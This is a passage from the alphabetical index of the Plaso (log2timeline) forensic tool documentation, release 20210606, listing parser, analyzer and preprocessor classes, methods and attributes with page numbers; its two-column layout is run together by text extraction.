(plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCEntry address (plaso.parsers.syslog_plugins.ssh.SSHEventData attribute), 291 attribute), 317 AMCacheFileEventData (class in AddRow() (plaso.cli.views.BaseTableView method), 95 plaso.parsers.winreg_plugins.amcache), AddRow() (plaso.cli.views.CLITableView method), 96 318

Index 517 Plaso (log2timeline), Release 20210606

AMCachePlugin (class in method), 186 plaso.parsers.winreg_plugins.amcache), analyzer_name (plaso.containers.analyzer_result.AnalyzerResult 319 attribute), 97 AMCacheProgramEventData (class in AnalyzerResult (class in plaso.parsers.winreg_plugins.amcache), plaso.containers.analyzer_result), 97 319 AnalyzersManager (class in plaso.analyzers.manager), analyses_performed (plaso.analysis.hash_tagging.HashAnalyzer 60 attribute), 41 AnalyzersProfiler (class in plaso.engine.profilers), analyses_performed (plaso.analysis.nsrlsvr.NsrlsvrAnalyzer 145 attribute), 47 AndFilter (class in plaso.filters.filters), 160 analysis_counter (plaso.containers.reports.AnalysisReportAndroidAppUsageEventData (class in attribute), 111 plaso.parsers.android_app_usage), 352 analysis_reports_counter AndroidAppUsageParser (class in (plaso.containers.sessions.Session attribute), plaso.parsers.android_app_usage), 352 112 AndroidCallEventData (class in analysis_reports_counter plaso.parsers.sqlite_plugins.android_calls), (plaso.containers.sessions.SessionCompletion 240 attribute), 114 AndroidCallPlugin (class in AnalysisMediator (class in plaso.analysis.mediator), plaso.parsers.sqlite_plugins.android_calls), 45 240 AnalysisMultiProcessEngine (class in AndroidSMSEventData (class in plaso.multi_process.analysis_engine), 186 plaso.parsers.sqlite_plugins.android_sms), AnalysisPlugin (class in plaso.analysis.interface), 43 243 AnalysisPluginManager (class in AndroidSMSPlugin (class in plaso.analysis.manager), 44 plaso.parsers.sqlite_plugins.android_sms), AnalysisPluginOptions (class in 243 plaso.cli.tool_options), 92 AndroidWebViewCacheEventData (class in AnalysisPluginsArgumentsHelper (class in plaso.parsers.sqlite_plugins.android_webviewcache), plaso.cli.helpers.analysis_plugins), 62 246 AnalysisProcess (class in AndroidWebViewCachePlugin (class in plaso.multi_process.analysis_process), 187 plaso.parsers.sqlite_plugins.android_webviewcache), AnalysisReport (class in plaso.containers.reports), 111 246 AnalysisTool (class in plaso.cli.analysis_tool), 82 ApacheAccessEventData (class in AnalysisWarning (class in plaso.containers.warnings), plaso.parsers.apache_access), 353 120 ApacheAccessParser (class in Analyze() (plaso.analysis.hash_tagging.HashAnalyzer plaso.parsers.apache_access), 353 method), 41 api_name (plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityEventData Analyze() (plaso.analysis.hash_tagging.HTTPHashAnalyzer attribute), 251 method), 40 app_version (plaso.parsers.czip_plugins.oxml.OpenXMLEventData Analyze() (plaso.analysis.nsrlsvr.NsrlsvrAnalyzer attribute), 217 method), 47 app_version (plaso.parsers.sqlite_plugins.appusage.MacOSApplicationUsageEventData Analyze() (plaso.analysis.viper.ViperAnalyzer method), attribute), 248 50 AppCompatCacheCachedEntry (class in Analyze() (plaso.analysis.virustotal.VirusTotalAnalyzer plaso.parsers.winreg_plugins.appcompatcache), method), 52 321 Analyze() (plaso.analyzers.hashing_analyzer.HashingAnalyzerAppCompatCacheEventData (class in method), 59 plaso.parsers.winreg_plugins.appcompatcache), Analyze() (plaso.analyzers.interface.BaseAnalyzer 321 method), 59 AppCompatCacheHeader (class in Analyze() (plaso.analyzers.yara_analyzer.YaraAnalyzer plaso.parsers.winreg_plugins.appcompatcache), method), 61 321 AnalyzeEvents() (plaso.cli.psteal_tool.PstealTool AppCompatCacheWindowsRegistryPlugin (class in method), 88 plaso.parsers.winreg_plugins.appcompatcache), AnalyzeEvents() (plaso.multi_process.analysis_engine.AnalysisMultiProcessEngine321

518 Index Plaso (log2timeline), Release 20210606

appearance (plaso.parsers.santa.SantaMountEventData ARTIFACT_DEFINITION_NAME attribute), 422 (plaso.preprocessors.linux.LinuxDistributionPlugin Append() (plaso.lib.bufferlib.CircularBuffer method), attribute), 471 178 ARTIFACT_DEFINITION_NAME AppendToParserChain() (plaso.preprocessors.linux.LinuxHostnamePlugin (plaso.parsers.mediator.ParserMediator attribute), 471 method), 397 ARTIFACT_DEFINITION_NAME AppleAccountPlugin (class in (plaso.preprocessors.linux.LinuxIssueFilePlugin plaso.parsers.plist_plugins.appleaccount), attribute), 471 232 ARTIFACT_DEFINITION_NAME application (plaso.parsers.cups_ipp.CupsIppEventData (plaso.preprocessors.linux.LinuxStandardBaseReleasePlugin attribute), 365 attribute), 471 application (plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataARTIFACT_DEFINITION_NAME attribute), 224 (plaso.preprocessors.linux.LinuxSystemdOperatingSystemPlugin application (plaso.parsers.esedb_plugins.srum.SRUMNetworkConnectivityUsageEventDataattribute), 471 attribute), 226 ARTIFACT_DEFINITION_NAME application (plaso.parsers.esedb_plugins.srum.SRUMNetworkDataUsageEventData(plaso.preprocessors.linux.LinuxTimeZonePlugin attribute), 226 attribute), 471 application (plaso.parsers.sqlite_plugins.appusage.MacOSApplicationUsageEventDataARTIFACT_DEFINITION_NAME attribute), 248 (plaso.preprocessors.linux.LinuxUserAccountsPlugin application (plaso.parsers.winjob.WinJobEventData attribute), 472 attribute), 460 ARTIFACT_DEFINITION_NAME application (plaso.parsers.winreg_plugins.winlogon.WinlogonEventData(plaso.preprocessors.macos.MacOSHostnamePlugin attribute), 350 attribute), 472 application_display_name ARTIFACT_DEFINITION_NAME (plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelineGenericEventData(plaso.preprocessors.macos.MacOSKeyboardLayoutPlugin attribute), 311 attribute), 472 application_focus_count ARTIFACT_DEFINITION_NAME (plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryEventData(plaso.preprocessors.macos.MacOSSystemVersionPlugin attribute), 349 attribute), 472 application_focus_duration ARTIFACT_DEFINITION_NAME (plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryEventData(plaso.preprocessors.macos.MacOSTimeZonePlugin attribute), 349 attribute), 472 application_name (plaso.parsers.trendmicroav.TrendMicroUrlEventDataARTIFACT_DEFINITION_NAME attribute), 450 (plaso.preprocessors.macos.MacOSUserAccountsPlugin ApplicationUsagePlugin (class in attribute), 472 plaso.parsers.sqlite_plugins.appusage), 247 ARTIFACT_DEFINITION_NAME APTHistoryLogEventData (class in (plaso.preprocessors.windows.WindowsAllUsersProfileEnvironmentVariablePlugin plaso.parsers.apt_history), 355 attribute), 476 APTHistoryLogParser (class in ARTIFACT_DEFINITION_NAME plaso.parsers.apt_history), 355 (plaso.preprocessors.windows.WindowsAvailableTimeZonesPlugin arg_url (plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityEventDataattribute), 476 attribute), 251 ARTIFACT_DEFINITION_NAME args (plaso.filters.expressions.Expression attribute), 156 (plaso.preprocessors.windows.WindowsCodepagePlugin args (plaso.filters.filters.Filter attribute), 161 attribute), 476 args (plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityEventDataARTIFACT_DEFINITION_NAME attribute), 251 (plaso.preprocessors.windows.WindowsEventLogProvidersPlugin ArgumentHelperManager (class in attribute), 476 plaso.cli.helpers.manager), 70 ARTIFACT_DEFINITION_NAME ArgumentsHelper (class in plaso.cli.helpers.interface), (plaso.preprocessors.windows.WindowsHostnamePlugin 69 attribute), 476 ARTIFACT_DEFINITION_NAME ARTIFACT_DEFINITION_NAME (plaso.preprocessors.interface.ArtifactPreprocessorPlugin (plaso.preprocessors.windows.WindowsProgramDataEnvironmentVariablePlugin attribute), 469 attribute), 476

Index 519 Plaso (log2timeline), Release 20210606

ARTIFACT_DEFINITION_NAME ATTRIBUTE_NAME (plaso.analyzers.hashers.entropy.EntropyHasher (plaso.preprocessors.windows.WindowsProgramFilesEnvironmentVariablePluginattribute), 55 attribute), 477 ATTRIBUTE_NAME (plaso.analyzers.hashers.interface.BaseHasher ARTIFACT_DEFINITION_NAME attribute), 55 (plaso.preprocessors.windows.WindowsProgramFilesX86EnvironmentVariablePluginATTRIBUTE_NAME (plaso.analyzers.hashers.md5.MD5Hasher attribute), 477 attribute), 57 ARTIFACT_DEFINITION_NAME ATTRIBUTE_NAME (plaso.analyzers.hashers.sha1.SHA1Hasher (plaso.preprocessors.windows.WindowsSystemProductPluginattribute), 58 attribute), 477 ATTRIBUTE_NAME (plaso.analyzers.hashers.sha256.SHA256Hasher ARTIFACT_DEFINITION_NAME attribute), 58 (plaso.preprocessors.windows.WindowsSystemRootEnvironmentVariablePluginattribute_name (plaso.containers.analyzer_result.AnalyzerResult attribute), 477 attribute), 97 ARTIFACT_DEFINITION_NAME attribute_name (plaso.parsers.mac_keychain.KeychainDatabaseColumn (plaso.preprocessors.windows.WindowsSystemVersionPluginattribute), 387 attribute), 477 attribute_type (plaso.parsers.ntfs.NTFSFileStatEventData ARTIFACT_DEFINITION_NAME attribute), 404 (plaso.preprocessors.windows.WindowsTimeZonePluginattribute_value (plaso.containers.analyzer_result.AnalyzerResult attribute), 477 attribute), 97 ARTIFACT_DEFINITION_NAME AttributeContainer (class in (plaso.preprocessors.windows.WindowsUserAccountsPluginplaso.containers.interface), 108 attribute), 477 AttributeContainerIdentifier (class in ARTIFACT_DEFINITION_NAME plaso.containers.interface), 109 (plaso.preprocessors.windows.WindowsWinDirEnvironmentVariablePluginAttributeContainerSerializer (class in attribute), 477 plaso.serializer.interface), 478 artifact_filters (plaso.containers.sessions.Session AttributeContainersManager (class in attribute), 112 plaso.containers.manager), 109 artifact_filters (plaso.containers.sessions.SessionConfigurationattributes (plaso.parsers.spotlight_storedb.SpotlightStoreMetadataItem attribute), 114 attribute), 433 artifact_filters (plaso.engine.configurations.ProcessingConfigurationaudit_type (plaso.parsers.selinux.SELinuxLogEventData attribute), 124 attribute), 426 ArtifactAttributeContainer (class in authentication_method plaso.containers.artifacts), 98 (plaso.parsers.syslog_plugins.ssh.SSHEventData ArtifactDefinitionsArgumentsHelper (class in attribute), 317 plaso.cli.helpers.artifact_definitions), 63 author (plaso.parsers.czip_plugins.oxml.OpenXMLEventData ArtifactDefinitionsFiltersHelper (class in attribute), 217 plaso.engine.artifact_filters), 122 author_identifier (plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidStatusEventData ArtifactFiltersArgumentsHelper (class in attribute), 307 plaso.cli.helpers.artifact_filters), 63 AutomaticDestinationsDestListEntryEventData ArtifactPreprocessorPlugin (class in (class in plaso.parsers.olecf_plugins.automatic_destinations), plaso.preprocessors.interface), 469 228 ASLEventData (class in plaso.parsers.asl), 356 AutomaticDestinationsOLECFPlugin (class in ASLFileEventData (class in plaso.parsers.asl), 357 plaso.parsers.olecf_plugins.automatic_destinations), ASLParser (class in plaso.parsers.asl), 357 229 attachment_location AutoRunsPlugin (class in (plaso.parsers.sqlite_plugins.imessage.IMessageEventData plaso.parsers.winreg_plugins.run), 338 attribute), 273 available_time_zones attribute (plaso.filters.expressions.Expression at- (plaso.containers.artifacts.SystemConfigurationArtifact tribute), 156, 157 attribute), 101 attribute_data_type available_time_zones (plaso.parsers.mac_keychain.KeychainDatabaseColumn (plaso.engine.knowledge_base.KnowledgeBase attribute), 387 property), 134 attribute_identifier (plaso.parsers.mac_keychain.KeychainDatabaseColumnB attribute), 387 background_bytes_read

520 Index Plaso (log2timeline), Release 20210606

(plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataBasePlugin (class in plaso.parsers.plugins), 411 attribute), 224 BasePluginCache (class in plaso.parsers.plugins), 412 background_bytes_written BaseStore (class in plaso.storage.interface), 495 (plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataBaseTableView (class in plaso.cli.views), 95 attribute), 224 BaseWindowsRegistryKeyFilter (class in background_context_switches plaso.parsers.winreg_plugins.interface), (plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventData325 attribute), 224 BashHistoryEventData (class in background_cycle_time plaso.parsers.bash_history), 358 (plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataBashHistoryParser (class in attribute), 225 plaso.parsers.bash_history), 358 background_number_for_flushes BasicEventFormatter (class in (plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataplaso.formatters.interface), 169 attribute), 225 BencodeFile (class in plaso.parsers.bencode_parser), background_number_for_read_operations 359 (plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataBencodeParser (class in attribute), 225 plaso.parsers.bencode_parser), 359 background_number_for_write_operations BencodePlugin (class in (plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataplaso.parsers.bencode_plugins.interface), attribute), 225 211 BackgroundActivityModeratorEventData (class in BencodeValues (class in plaso.parsers.winreg_plugins.bam), 323 plaso.parsers.bencode_parser), 360 BackgroundActivityModeratorWindowsRegistryPluginBINARY_DATA_COLUMN_TYPES (class in plaso.parsers.winreg_plugins.bam), (plaso.parsers.esedb_plugins.interface.ESEDBPlugin 323 attribute), 220 backup_id (plaso.parsers.symantec.SymantecEventData binary_path (plaso.parsers.winreg_plugins.bam.BackgroundActivityModeratorEventData attribute), 436 attribute), 323 BadConfigObject, 180 BinaryCookieParser (class in BadConfigOption, 180 plaso.parsers.safari_cookies), 418 BagMRUEventData (class in BinaryDSVReader (class in plaso.lib.line_reader_file), plaso.parsers.winreg_plugins.bagmru), 322 182 BagMRUWindowsRegistryPlugin (class in BinaryExpression (class in plaso.filters.expressions), plaso.parsers.winreg_plugins.bagmru), 322 156 BaseAnalyzer (class in plaso.analyzers.interface), 59 BinaryLineReader (class in plaso.lib.line_reader_file), BaseChromeCookiePlugin (class in 182 plaso.parsers.sqlite_plugins.chrome_cookies), BinaryOperator (class in plaso.filters.filters), 160 249 birth_droid_file_identifier BaseCookiePlugin (class in (plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsDestListEntryEventData plaso.parsers.cookie_plugins.interface), 215 attribute), 228 BaseEngine (class in plaso.engine.engine), 127 birth_droid_file_identifier BaseFileEntryFilter (class in (plaso.parsers.winlnk.WinLnkLinkEventData plaso.parsers.interface), 381 attribute), 461 BaseFirefoxCacheParser (class in birth_droid_volume_identifier plaso.parsers.firefox_cache), 373 (plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsDestListEntryEventData BaseGoogleChromeHistoryPlugin (class in attribute), 228 plaso.parsers.sqlite_plugins.chrome_history), birth_droid_volume_identifier 253 (plaso.parsers.winlnk.WinLnkLinkEventData BaseHasher (class in plaso.analyzers.hashers.interface), attribute), 461 55 birthday (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidContactEventData BaseMRUListExWindowsRegistryPlugin (class in attribute), 300 plaso.parsers.winreg_plugins.mrulistex), 331 BLANK (plaso.parsers.iis.WinIISParser attribute), 380 BaseMRUListWindowsRegistryPlugin (class in block_mode (plaso.parsers.trendmicroav.TrendMicroUrlEventData plaso.parsers.winreg_plugins.mrulist), 329 attribute), 450 BaseParser (class in plaso.parsers.interface), 382 block_number (plaso.parsers.chrome_cache.CacheAddress

Index 521 Plaso (log2timeline), Release 20210606

attribute), 361 bundle_id (plaso.parsers.sqlite_plugins.appusage.MacOSApplicationUsageEventData block_offset (plaso.parsers.chrome_cache.CacheAddress attribute), 248 attribute), 361 bundle_identifier (plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCApplicationEventData block_size (plaso.parsers.chrome_cache.CacheAddress attribute), 284 attribute), 361 bundle_identifier (plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCSafariEventData BluetoothPlugin (class in attribute), 286 plaso.parsers.plist_plugins.bluetooth), 233 bundle_name (plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterEventData body (plaso.parsers.dpkg.DpkgEventData attribute), 369 attribute), 288 body (plaso.parsers.selinux.SELinuxLogEventData at- bus (plaso.parsers.santa.SantaMountEventData attribute), 426 tribute), 421 body (plaso.parsers.sqlite_plugins.android_sms.AndroidSMSEventDatabytes_received (plaso.parsers.esedb_plugins.srum.SRUMNetworkDataUsageEventData attribute), 243 attribute), 226 body (plaso.parsers.sqlite_plugins.hangouts_messages.HangoutsMessageDatabytes_sent (plaso.parsers.esedb_plugins.srum.SRUMNetworkDataUsageEventData attribute), 270 attribute), 226 body (plaso.parsers.sqlite_plugins.kik_ios.KikIOSMessageEventData attribute), 276 C body (plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterEventDatacache_directory_index attribute), 288 (plaso.parsers.msiecf.MSIECFLeakEventData body (plaso.parsers.syslog.SyslogCommentEventData at- attribute), 401 tribute), 441 cache_directory_index body (plaso.parsers.syslog.SyslogLineEventData at- (plaso.parsers.msiecf.MSIECFURLEventData tribute), 442 attribute), 402 body (plaso.parsers.systemd_journal.SystemdJournalEventDatacache_directory_name attribute), 444 (plaso.parsers.msiecf.MSIECFLeakEventData BooleanEventFormatterHelper (class in attribute), 401 plaso.formatters.interface), 170 cache_directory_name BootExecutePlugin (class in (plaso.parsers.msiecf.MSIECFURLEventData plaso.parsers.winreg_plugins.lfu), 327 attribute), 402 BootVerificationPlugin (class in cache_identifier (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventData plaso.parsers.winreg_plugins.lfu), 327 attribute), 221 BrowserSearchPlugin (class in CacheAddress (class in plaso.parsers.chrome_cache), plaso.analysis.browser_search), 39 361 bsd_name (plaso.parsers.santa.SantaMountEventData cached_file_size (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventData attribute), 421 attribute), 221 BSMEventData (class in plaso.parsers.bsm), 360 cached_file_size (plaso.parsers.msiecf.MSIECFLeakEventData BSMParser (class in plaso.parsers.bsm), 360 attribute), 401 BUFFER_SIZE (plaso.parsers.gdrive_synclog.GoogleDriveSyncLogParsercached_file_size (plaso.parsers.msiecf.MSIECFURLEventData attribute), 376 attribute), 402 BUFFER_SIZE (plaso.parsers.sccm.SCCMParser at- cached_filename (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventData tribute), 424 attribute), 221 BUFFER_SIZE (plaso.parsers.text_parser.PyparsingMultiLineTextParsercached_filename (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheLeakFilesEventData attribute), 447 attribute), 223 build_number (plaso.parsers.winreg_plugins.windows_version.WindowsRegistryInstallationEventDatacached_filename (plaso.parsers.msiecf.MSIECFLeakEventData attribute), 349 attribute), 401 BuildArtifactsRegistry() cached_filename (plaso.parsers.msiecf.MSIECFURLEventData (plaso.engine.engine.BaseEngine class attribute), 402 method), 127 CacheEntry (class in plaso.parsers.chrome_cache), 361 BuildCollectionFilters() CacheQueryResults() (plaso.engine.engine.BaseEngine method), (plaso.parsers.sqlite.SQLiteCache method), 127 434 BuildFindSpecs() (plaso.engine.artifact_filters.ArtifactDefinitionsFiltersHelpercall_type (plaso.parsers.sqlite_plugins.android_calls.AndroidCallEventData method), 123 attribute), 240 BuildFindSpecs() (plaso.engine.path_filters.PathCollectionFiltersHelperCALL_TYPE (plaso.parsers.sqlite_plugins.android_calls.AndroidCallPlugin method), 135 attribute), 240

522 Index Plaso (log2timeline), Release 20210606 call_type (plaso.parsers.sqlite_plugins.skype.SkypeCallEventData 505 attribute), 295 CheckFilterExpression() caller (plaso.parsers.mac_securityd.MacOSSecuritydLogEventData(plaso.parsers.manager.ParsersManager attribute), 389 class method), 393 CallFunction() (plaso.multi_process.plaso_xmlrpc.XMLRPCClientCheckKeyCompatibility() method), 190 (plaso.engine.artifact_filters.ArtifactDefinitionsFiltersHelper CallFunction() (plaso.multi_process.rpc.RPCClient class method), 123 method), 191 CheckOutDated() (plaso.cli.tools.CLITool method), 93 caption (plaso.parsers.bencode_plugins.utorrent.UTorrentEventDataCheckPath() (plaso.filters.path_filter.PathFilterScanTree attribute), 213 method), 165 case_sensitive (plaso.containers.artifacts.EnvironmentVariableArtifactCheckRequiredKeys() attribute), 98 (plaso.parsers.bencode_plugins.interface.BencodePlugin cat (plaso.parsers.symantec.SymantecEventData at- method), 211 tribute), 437 CheckRequiredPaths() CATEGORY (plaso.cli.helpers.dynamic_output.DynamicOutputArgumentsHelper(plaso.parsers.czip_plugins.interface.CompoundZIPPlugin attribute), 65 method), 216 CATEGORY (plaso.cli.helpers.elastic_output.ElasticSearchOutputArgumentsHelperCheckRequiredTables() attribute), 66 (plaso.parsers.esedb_plugins.interface.ESEDBPlugin CATEGORY (plaso.cli.helpers.elastic_ts_output.ElasticTimesketchOutputArgumentsHelpermethod), 220 attribute), 66 CheckRequiredTablesAndColumns() CATEGORY (plaso.cli.helpers.interface.ArgumentsHelper (plaso.parsers.sqlite_plugins.interface.SQLitePlugin attribute), 69 method), 275 CATEGORY (plaso.cli.helpers.nsrlsvr_analysis.NsrlsvrAnalysisArgumentsHelperCheckSchema() (plaso.parsers.sqlite_plugins.interface.SQLitePlugin attribute), 71 method), 276 CATEGORY (plaso.cli.helpers.sessionize_analysis.SessionizeAnalysisArgumentsHelperCheckStorageFileHasSupportedFormat() attribute), 75 (plaso.storage.factory.StorageFactory class CATEGORY (plaso.cli.helpers.tagging_analysis.TaggingAnalysisArgumentsHelpermethod), 493 attribute), 76 CheckSupportedFormat() CATEGORY (plaso.cli.helpers.viper_analysis.ViperAnalysisArgumentsHelper(plaso.storage.sqlite.sqlite_file.SQLiteStorageFile attribute), 79 class method), 489 CATEGORY (plaso.cli.helpers.virustotal_analysis.VirusTotalAnalysisArgumentsHelperCheckTaskToMerge() (plaso.multi_process.task_manager.TaskManager attribute), 79 method), 192 CATEGORY (plaso.cli.helpers.windows_services_analysis.WindowsServicesAnalysisArgumentsHelperChrome17CookiePlugin (class in attribute), 80 plaso.parsers.sqlite_plugins.chrome_cookies), CATEGORY (plaso.cli.helpers.xlsx_output.XLSXOutputArgumentsHelper249 attribute), 81 Chrome66CookiePlugin (class in category_message_files plaso.parsers.sqlite_plugins.chrome_cookies), (plaso.containers.artifacts.WindowsEventLogProviderArtifact250 attribute), 103 ChromeAutofillEventData (class in CCleanerConfigurationEventData (class in plaso.parsers.sqlite_plugins.chrome_autofill), plaso.parsers.winreg_plugins.ccleaner), 248 323 ChromeAutofillPlugin (class in CCleanerPlugin (class in plaso.parsers.sqlite_plugins.chrome_autofill), plaso.parsers.winreg_plugins.ccleaner), 248 324 ChromeCacheDataBlockFileParser (class in CCleanerUpdateEventData (class in plaso.parsers.chrome_cache), 362 plaso.parsers.winreg_plugins.ccleaner), ChromeCacheEntryEventData (class in 324 plaso.parsers.chrome_cache), 362 certificate_common_name ChromeCacheIndexFileParser (class in (plaso.parsers.santa.SantaExecutionEventData plaso.parsers.chrome_cache), 362 attribute), 419 ChromeCacheParser (class in certificate_hash (plaso.parsers.santa.SantaExecutionEventData plaso.parsers.chrome_cache), 363 attribute), 419 ChromeContentSettingsExceptionsEventData CheckDependencies() (in module plaso.dependencies), (class in plaso.parsers.chrome_preferences),

Index 523 Plaso (log2timeline), Release 20210606

363 Close() (plaso.formatters.winevt_rc.Sqlite3DatabaseFile ChromeCookieEventData (class in method), 175 plaso.parsers.sqlite_plugins.chrome_cookies), Close() (plaso.formatters.winevt_rc.Sqlite3DatabaseReader 250 method), 175 ChromeExtensionActivityEventData (class in Close() (plaso.multi_process.plaso_xmlrpc.XMLRPCClient plaso.parsers.sqlite_plugins.chrome_extension_activity), method), 191 251 Close() (plaso.multi_process.rpc.RPCClient method), ChromeExtensionActivityPlugin (class in 191 plaso.parsers.sqlite_plugins.chrome_extension_activityClose()), (plaso.output.interface.OutputModule method), 252 197 ChromeExtensionInstallationEventData (class in Close() (plaso.output.interface.TextFileOutputModule plaso.parsers.chrome_preferences), 364 method), 198 ChromeExtensionPlugin (class in Close() (plaso.output.shared_elastic.SharedElasticsearchOutputModule plaso.analysis.chrome_extension), 40 method), 207 ChromeExtensionsAutoupdaterEventData (class in Close() (plaso.output.xlsx.XLSXOutputModule plaso.parsers.chrome_preferences), 364 method), 210 ChromeHistoryFileDownloadedEventData (class in Close() (plaso.parsers.bencode_parser.BencodeFile plaso.parsers.sqlite_plugins.chrome_history), method), 359 253 Close() (plaso.parsers.esedb.ESEDatabase method), ChromeHistoryPageVisitedEventData (class in 371 plaso.parsers.sqlite_plugins.chrome_history), Close() (plaso.parsers.sqlite.SQLiteDatabase method), 254 435 ChromeHistoryTypedCountFormatterHelper (class Close() (plaso.storage.fake.fake_store.FakeStore in plaso.formatters.chrome), 167 method), 480 ChromePreferencesClearHistoryEventData (class Close() (plaso.storage.interface.BaseStore method), 496 in plaso.parsers.chrome_preferences), 364 Close() (plaso.storage.merge_reader.StorageMergeReader ChromePreferencesParser (class in method), 498 plaso.parsers.chrome_preferences), 364 Close() (plaso.storage.reader.StorageReader method), ChromePreferencesPrimaryURLFormatterHelper 499 (class in plaso.formatters.chrome_preferences), Close() (plaso.storage.redis.redis_store.RedisStore 167 method), 484 ChromePreferencesSecondaryURLFormatterHelper Close() (plaso.storage.sqlite.sqlite_file.SQLiteStorageFile (class in plaso.formatters.chrome_preferences), method), 489 167 Close() (plaso.storage.writer.StorageWriter method), CircularBuffer (class in plaso.lib.bufferlib), 178 501 cleaninfo (plaso.parsers.symantec.SymantecEventData CLOUD_PATH_CACHE_QUERY attribute), 437 (plaso.parsers.sqlite_plugins.gdrive.GoogleDrivePlugin Clear() (plaso.lib.bufferlib.CircularBuffer method), 178 attribute), 267 ClearParserChain() (plaso.parsers.mediator.ParserMediatorcode_page (plaso.containers.artifacts.SystemConfigurationArtifact method), 397 attribute), 101 client (plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCEntrycodepage (plaso.engine.knowledge_base.KnowledgeBase attribute), 291 property), 134 clientgroup (plaso.parsers.symantec.SymantecEventDatacodepage (plaso.parsers.mediator.ParserMediator prop- attribute), 437 erty), 400 CLIInputReader (class in plaso.cli.tools), 93 Collect() (plaso.preprocessors.interface.FileSystemArtifactPreprocessorPlugin CLIOutputWriter (class in plaso.cli.tools), 93 method), 470 CLITableView (class in plaso.cli.views), 96 Collect() (plaso.preprocessors.interface.KnowledgeBasePreprocessorPlugin CLITabularTableView (class in plaso.cli.views), 96 method), 470 CLITool (class in plaso.cli.tools), 93 Collect() (plaso.preprocessors.interface.WindowsRegistryKeyArtifactPreprocessorPlugin Close() (plaso.engine.plaso_queue.Queue method), 137 method), 470 Close() (plaso.engine.zeromq_queue.ZeroMQBufferedQueueCollect() (plaso.preprocessors.windows.WindowsAllUsersAppDataKnowledgeBasePlugin method), 149 method), 475 Close() (plaso.engine.zeromq_queue.ZeroMQQueue Collect() (plaso.preprocessors.windows.WindowsAllUsersAppProfileKnowledgeBasePlugin method), 152 method), 475

524 Index Plaso (log2timeline), Release 20210606

Collect() (plaso.preprocessors.windows.WindowsProgramDataKnowledgeBasePlugin(plaso.parsers.winlnk.WinLnkLinkEventData method), 477 attribute), 461 CollectFromFileSystem() COMMENT (plaso.parsers.iis.WinIISParser attribute), 380 (plaso.preprocessors.manager.PreprocessPluginsManagerCOMMENT_LINE_HASH (plaso.parsers.text_parser.PyparsingConstants class method), 473 attribute), 446 CollectFromKnowledgeBase() comments (plaso.parsers.mac_keychain.KeychainApplicationRecordEventData (plaso.preprocessors.manager.PreprocessPluginsManager attribute), 386 class method), 473 comments (plaso.parsers.mac_keychain.KeychainInternetRecordEventData CollectFromWindowsRegistry() attribute), 387 (plaso.preprocessors.manager.PreprocessPluginsManagercomments (plaso.parsers.winreg_plugins.sam_users.SAMUsersWindowsRegistryEventData class method), 473 attribute), 339 collection_filters_helper company_name (plaso.parsers.winreg_plugins.amcache.AMCacheFileEventData (plaso.engine.engine.BaseEngine attribute), attribute), 318 127 COMPARE_EXCLUDE (plaso.analysis.windows_services.WindowsService collection_filters_helper attribute), 53 (plaso.parsers.mediator.ParserMediator compare_storage_information attribute), 397 (plaso.cli.pinfo_tool.PinfoTool attribute), CollectionFiltersHelper (class in 85 plaso.engine.filters_helper), 130 CompareExpression() COLUMNS (plaso.parsers.dsv_parser.DSVParser at- (plaso.filters.expression_parser.Token method), tribute), 370 155 columns (plaso.parsers.mac_keychain.KeychainDatabaseTableCompareStores() (plaso.cli.pinfo_tool.PinfoTool attribute), 387 method), 86 COLUMNS (plaso.parsers.mcafeeav.McafeeAccessProtectionParserCompile() (plaso.filters.expressions.BinaryExpression attribute), 396 method), 156 COLUMNS (plaso.parsers.networkminer.NetworkMinerParserCompile() (plaso.filters.expressions.EventExpression attribute), 404 method), 156 COLUMNS (plaso.parsers.symantec.SymantecParser Compile() (plaso.filters.expressions.Expression attribute), 441 method), 157 COLUMNS (plaso.parsers.trendmicroav.OfficeScanVirusDetectionParserCompile() (plaso.filters.expressions.IdentityExpression attribute), 448 method), 157 COLUMNS (plaso.parsers.trendmicroav.OfficeScanWebReputationParsercompiled_re (plaso.filters.filters.Regexp attribute), 163 attribute), 449 CompileFilter() (plaso.filters.event_filter.EventObjectFilter COLUMNS (plaso.parsers.trendmicroav.TrendMicroBaseParser method), 154 attribute), 450 CompileReport() (plaso.analysis.browser_search.BrowserSearchPlugin command (plaso.parsers.apt_history.APTHistoryLogEventData method), 39 attribute), 355 CompileReport() (plaso.analysis.chrome_extension.ChromeExtensionPlugin command (plaso.parsers.bash_history.BashHistoryEventData method), 40 attribute), 358 CompileReport() (plaso.analysis.hash_tagging.HashTaggingAnalysisPlugin command (plaso.parsers.docker.DockerJSONLayerEventData method), 42 attribute), 368 CompileReport() (plaso.analysis.interface.AnalysisPlugin command (plaso.parsers.syslog_plugins.cron.CronTaskRunEventData method), 43 attribute), 316 CompileReport() (plaso.analysis.sessionize.SessionizeAnalysisPlugin command (plaso.parsers.winreg_plugins.winlogon.WinlogonEventDatamethod), 48 attribute), 350 